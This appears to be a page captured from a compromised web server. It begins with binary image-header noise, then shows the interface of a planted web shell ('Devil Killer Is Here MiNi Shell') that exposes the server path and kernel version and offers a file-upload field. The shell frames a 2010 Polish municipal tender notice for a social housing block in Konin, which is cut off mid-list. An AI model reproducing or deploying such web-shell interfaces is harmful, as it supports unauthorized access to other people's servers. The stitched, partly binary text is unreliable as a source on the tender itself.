JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100429/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100429/119800-N-2010.html

<p class="kh_header"><b>Konin: Budowa wielorodzinnego, socjalnego budynku mieszkalnego w Koninie przy ul. Ludomiła Pułaskiego na działce nr 1675/57, obręb Przydziałki, w systemie partnerstwa publiczno - prywatnego zgodnie z ustawą z dnia 19 grudnia 2008r. o partnerstwie publiczno - prywatnym , (Dz. U. z 2009r., Nr.19, poz.100).</b><br>
<b>Numer ogłoszenia: 119800 - 2010; data zamieszczenia: 29.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski  w Koninie , Plac Wolności 1, 62-500 Konin, woj. wielkopolskie, tel. (063) 24-01-111, 63 2401139, faks (063) 2401135.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.konin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa wielorodzinnego, socjalnego budynku mieszkalnego w Koninie przy ul. Ludomiła Pułaskiego na działce nr 1675/57, obręb Przydziałki, w systemie partnerstwa publiczno - prywatnego zgodnie z ustawą z dnia 19 grudnia 2008r. o partnerstwie publiczno - prywatnym , (Dz. U. z 2009r., Nr.19, poz.100)..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
Budowa wielorodzinnego, socjalnego budynku mieszkalnego w Koninie przy  ul. Ludomiła Pułaskiego na działce nr 1675/57, obręb Przydziałki, w systemie partnerstwa publiczno - prywatnego zgodnie z ustawą z dnia 19 grudnia 2008r.  o partnerstwie publiczno - prywatnym (Dz. U. z 2009r., Nr.19, poz. 100).
PRZEDMIOT ZAMÓWIENIA OBEJMUJE:
1.Przeprowadzenie całego procesu inwestycyjnego (projekt, budowa oraz eksploatacja) na każdym etapie jego realizacji zgodnie z obowiązującymi w tym zakresie przepisami prawa polskiego w tym, ustawy z dnia 19 grudnia 2008r. 
o partnerstwie publiczno - prywatnym (Dz. U. z 2009r., Nr.19, poz. 100) zwanej dalej PPP. Wykonawca (Partner Prywatny) przyjmuje na siebie częściowe ryzyko finansowe przedsięwzięcia przez cały okres obowiązywania umowy o PPP. Realizacja obiektu ma nastąpić zgodnie z wymaganiami Zamawiającego. 
2.Teren przeznaczony pod budowę wielorodzinnego, socjalnego budynku mieszkalnego, znajduje się w południowej części miasta Konin. Działka nr 1675/57, obręb Przydziałki na której przewiduje się projektowaną zabudowę, stanowi zurbanizowany teren niezabudowany i jest wydzielona z większego terenu przeznaczonego na zabudowę mieszkaniową wielorodzinną. Działka jest nie zainwestowana. Teren jest płaski. Zieleń w postaci drzew i krzewów nie występuje. 
3.Zgodnie z miejscowym planem zagospodarowania przestrzennego terenu oraz wytycznymi Zamawiającego do programu funkcjonalno-użytkowego na terenie, na którym znajduje się planowana inwestycja przewiduje się lokalizację: 
a.budynku mieszkalnego socjalnego składającego się z części mieszkalnej, którą stanowią 48 mieszkań o zróżnicowanej wielkości 
i strukturze, pomieszczenia techniczne i gospodarcze, 
b.parkingu terenowego, 
c.urządzenia rekreacji i plac zabaw. 
Liczba kondygnacji nadziemnych budynku nie może przekroczyć 4. Dojazd 
i dojście do budynku należy zapewnić od strony ul. Ludomiła Pułaskiego. Na terenie działki należy zaprojektować lokalizację wydzielonych miejsc do gromadzenia i usuwania odpadów oraz pojemników do prowadzenia selektywnej zbiórki odpadów. 
Charakterystyczne parametry określające wielkość obiektu: 
- powierzchnia działki -  0, 4292 ha, 
- ilość projektowanych mieszkań - 48, 
- powierzchnia użytkowa mieszkań - 1 592,00 m2, 
- ilość kondygnacji naziemnych - 4,
- ilość kondygnacji podziemnych - 1.
Wartość wskaźnika powierzchni użytkowej budynku do powierzchni netto budynku winna być większa od 0,7 ( Pu/Pn > 0,7 )
Uwzględniając wytyczne Zamawiającego oraz charakter socjalny mieszkań, powierzchnia lokali mieszkalnych nie powinna przekraczać następujących wielkości: 
26m2x16 mieszkań =416 m2,                                          
34m2x24 mieszkania = 816m2,
45m2x 8 mieszkań = 360 m2.
Łączna liczba mieszkań 48 o pow.1.592m2.
Dopuszcza się możliwość przekroczenia powierzchni użytkowej mieszkań  maksymalnie do 5 %.
Wytyczne Zamawiającego do programu funkcjonalno-użytkowego budynku mieszkalnego: 
a.Kondygnacje naziemne
-mieszkania jednopokojowe i dwupokojowe z aneksem kuchennym 
i łazienką, bez balkonów i logi;
-komunikacja: klatka schodowa i galerie zewnętrzne.
b.Piwnice
-pomieszczenia techniczne: węzeł cieplny, pomieszczenie wodomierza, blok energetyczny;
-pomieszczenia gospodarcze dla lokatorów ;
-suszarnie bielizny;
-pomieszczenie na wózki i rowery;
-jedno pomieszczenie niezbędne dla funkcjonowania obiektu dla gospodarza budynku z toaletą.
Komunikacja wewnętrzna w budynku w oparciu o galerię komunikacyjną zewnętrzną zapewniającą wejścia do mieszkań z galerii poprzez klatkę schodową. 
Dostęp do budynku należy zapewnić z poziomu terenu bez stopni i platform dla osób niepełnosprawnych. Wszystkie mieszkania w parterze budynku dostępne dla osób niepełnosprawnych. 
4.W zakresie zaopatrzenia w wodę przewiduje się zaopatrzenie z miejskiej sieci wodociągowej według uzgodnień z dostawcą wody. Ścieki bytowe i komunalne powinny być odprowadzane do kanalizacji sanitarnej według uzgodnień z odbiorcą ścieków. Wody opadowe z budynku lub innych niezabudowanych powierzchni utwardzonych powinny być odprowadzane do kanalizacji deszczowej według warunków wydanych przez Wydział Drogownictwa i Gospodarki Komunalnej Urzędu Miasta. W zakresie zaopatrzenia w energię cieplną przewiduje się podłączenie do miejskiej sieci ciepłowniczej. Ciepła woda użytkowa z bojlerów. Kuchnie elektryczne. Wewnętrzna instalacja elektryczna dostosowana do podłączenia kuchni elektrycznych i bojlerów. Wszystkie urządzenia pomiarowe służące do rozliczeń najemców zlokalizowane albo  w wydzielonych pomieszczeniach na kondygnacjach lub piwnicy. Liczniki energii elektrycznej lokatorskie, zlokalizowane przy wejściu do lokalu na zewnętrznej ścianie lokalu.  Nie przewiduje się zaopatrzenia budynku w gaz z sieci miejskiej. W zakresie zaopatrzenia w energię elektryczną przewiduje się budowę przyłącza energetycznego według warunków wydanych przez dostawcę energii elektrycznej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.40-4, 71.22.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 240.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wadium;
a)Po zakończeniu fazy dialogu zamawiający zaprosi wykonawców z którymi prowadził dialog do złożenia ofert.
b)Przed złożeniem oferty , wykonawca zobowiązany  będzie wnieść wadium w wysokości 60.000,00 zł.(słownie: sześćdziesiąt tysięcy złotych),
c)Wadium może być wniesione w jednej lub kilku formach wymienionych w art.45 ust.6 ustawy Prawo zamówień publicznych,
d)Wymagania szczegółowe dotyczące wadium zostaną podane w zaproszeniu do składania ofert skierowanym do wykonawców , którzy uczestniczyli w dialogu.
2.Zabezpieczenie należytego wykonania umowy  Wykonawca zobowiązany będzie wnieść  w wysokości 5 % przed zawarciem umowy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony ,jeżeli wykonawca wykaże ,że posiada niezbędne doświadczenie wyrażające się wykonaniem w całości w okresie ostatnich 5 lat przed upływem terminu na składanie wniosków o dopuszczenie do udziału w postępowaniu (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), robót budowlanych polegających na wybudowaniu co najmniej jednego wielorodzinnego budynku mieszkalnego (min. 30 lokali mieszkalnych w budynku).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony ,jeżeli wykonawca  będzie dysponował  dla potrzeb niniejszego postępowania osobami zdolnymi do wykonania przedmiotu zamówienia  tj:
a)głównym projektantem posiadającym  łącznie :
- uprawnienia budowlane do projektowania bez ograniczeń w specjalności architektonicznej,
- doświadczenie wyrażające się zaprojektowaniem co najmniej jednego wielorodzinnego budynku  mieszkalnego o min.30 lokalach
b)projektantami branżowymi posiadającymi uprawnienia budowlane do projektowania w specjalnościach: 
- konstrukcyjno-budowlanej, 
- instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych 
i elektroenergetycznych, 
-instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych,
c)kierownikiem budowy posiadającym łącznie: 
- uprawnienia budowlane bez ograniczeń w specjalności konstrukcyjno - budowlanej, 
- doświadczenie w pełnieniu funkcji kierownika budowy, której przedmiotem była co najmniej jedna budowa wielorodzinnego budynku mieszkalnego (min. 30 lokali),
d)kierownikiem robót w specjalności sanitarnej posiadającym: 
- uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wodociągowych, kanalizacyjnych,
e)kierownikiem robót w specjalności elektrycznej posiadającym: 
- uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych. 
Projektanci, kierownik budowy i kierownicy robót powinni posiadać uprawnienia budowlane (w podanych wyżej specjalnościach) w rozumieniu rozporządzenia Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006r. w sprawie samodzielnych funkcji technicznych  w budownictwie (Dz. U. z 2006 Nr 83 poz. 578 z późn. zm.)  
f)osobą posiadającą doświadczenie w zarządzaniu obiektami mieszkalnymi:  posiadającą co najmniej dwuletni, udokumentowany staż w zakresie zarządzania 
(w rozumieniu art. 184 ust. 2 ustawy o gospodarce nieruchomościami) obiektami mieszkalnymi.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony, jeżeli Wykonawca:
a)Posiada  środki finansowe lub zdolność kredytową na kwotę minimum 4.000.000,00 zł.
b)Posiada  ubezpieczenie  od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia  na kwotę nie  mniejszą niż 4 000 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> dialog konkurencyjny.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 3.</p>
<p class="bold">Znaczenie warunków wyboru wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</p>
<p>Jeżeli liczba Wykonawców, którzy spełniają warunki udziału w postępowaniu, będzie większa niż 3, to do dalszego udziału w postępowaniu zostaną zaproszeni Wykonawcy, którzy otrzymają kolejno najwyższe oceny spełnienia następujących warunków : 
-posiadania doświadczenia, 
-posiadania zdolności kredytowej lub posiadanych środków finansowych, 
w wyniku czego powstanie tzw. (lista rankingowa) Wykonawców ( Partnerów Prywatnych) i do dalszego udziału w postępowaniu zostanie zaproszonych pierwszych trzech Wykonawców, którzy uzyskali najwyższą liczbę punktów. 
Znaczenie  warunku doświadczenia  - 45%
Zasada oceny: za każdą wykonaną robotę   potwierdzoną dokumentem  że została wykonana zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona  ponad minimum , o którym mowa w  pkt. III. 3.2  Wykonawca otrzyma  1 pkt., ( max. 10 pkt.). 
Ocena punktowa warunku dokonana zostanie zgodnie ze wzorem: Ilość punktów badanego wniosku x 45% .
Znaczenie  warunku sytuacji ekonomicznej i finansowej - 55%
Zasada oceny:  za każde   100.000,00 zł. udokumentowane wyciągiem z konta lub opinią banku  o zdolności kredytowej ponad  żądane  4.000.000,00 zł ,Wykonawca otrzyma 1 pkt. ( max. 10 pkt.). 
Ocena punktowa warunku dokonana zostanie zgodnie ze wzorem: Ilość punktów badanego wniosku  x 55%.
Jeżeli liczba wykonawców , którzy spełniają warunki udziału w postępowaniu będzie  mniejsza niż 3 , zamawiający zaprosi  do dialogu wszystkich wykonawców spełniających te warunki.</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 30</li>
<li>2 - Podział zadań i ryzyk pomiędzy Podmiotem Publicznym i Partnerem Prywatnym - 20</li>
<li>3 - Termin przewidywanych płatności Podmiotu Publicznego - 25</li>
<li>4 - Wysokość przewidywanych płatności Podmiotu Publicznego - 25</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> Wniosek o dopuszczenie udziału  w dialogu  dostępny jest  na stronie www.konin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wniosek  można uzyskać także pod adresem:   Urząd Miejski w Koninie , 62-500 Konin, pl. Wolności 1, pok. nr 303 do dnia  28.05.2010r..</p><p><b>IV.4.2) Opis potrzeb i wymagań zamawiającego określonych w sposób umożliwiający przygotowanie się wykonawców do udziału w dialogu konkurencyjnym lub informacja o sposobie uzyskania tego opisu:</b> I.INFORMACJE ADMINISTRACYJNE
1.Zamawiający (Podmiot Publiczny) zamierza zrealizować przedsięwzięcie pn. Budowa wielorodzinnego, socjalnego budynku mieszkalnego w Koninie przy ul. Ludomiła Pułaskiego na działce nr 1675/57, obręb Przydziałki  przy udziale Wykonawcy (Partnera Prywatnego) w ramach partnerstwa publiczno - prywatnego na zasadach określonych w ustawie z dnia 19 grudnia 2008r. o Partnerstwie Publiczno -Prywatnym (Dz. U. z 2009r., Nr.19, poz. 100), w związku z art. 4 ust. 2 cytowanej wyżej ustawy. 
2.Przedmiotem partnerstwa publiczno - prywatnego będzie wspólna realizacja przedsięwzięcia na podstawie zawartej umowy o PPP w której zostanie określony podział zadań i ryzyka między partnerem prywatnym (Wykonawcą) a podmiotem publicznym (Zamawiającym). 
3.Zakładany przez Partnera Publicznego termin realizacji umowy o PPP wynosi 20 lat (wymaganie nie ma charakteru ostatecznego). 
4.Wybór partnera prywatnego nastąpi przy zastosowaniu dialogu konkurencyjnego. Dialog konkurencyjny przebiega w trzech etapach, w których przeprowadzane jest obligatoryjne: 
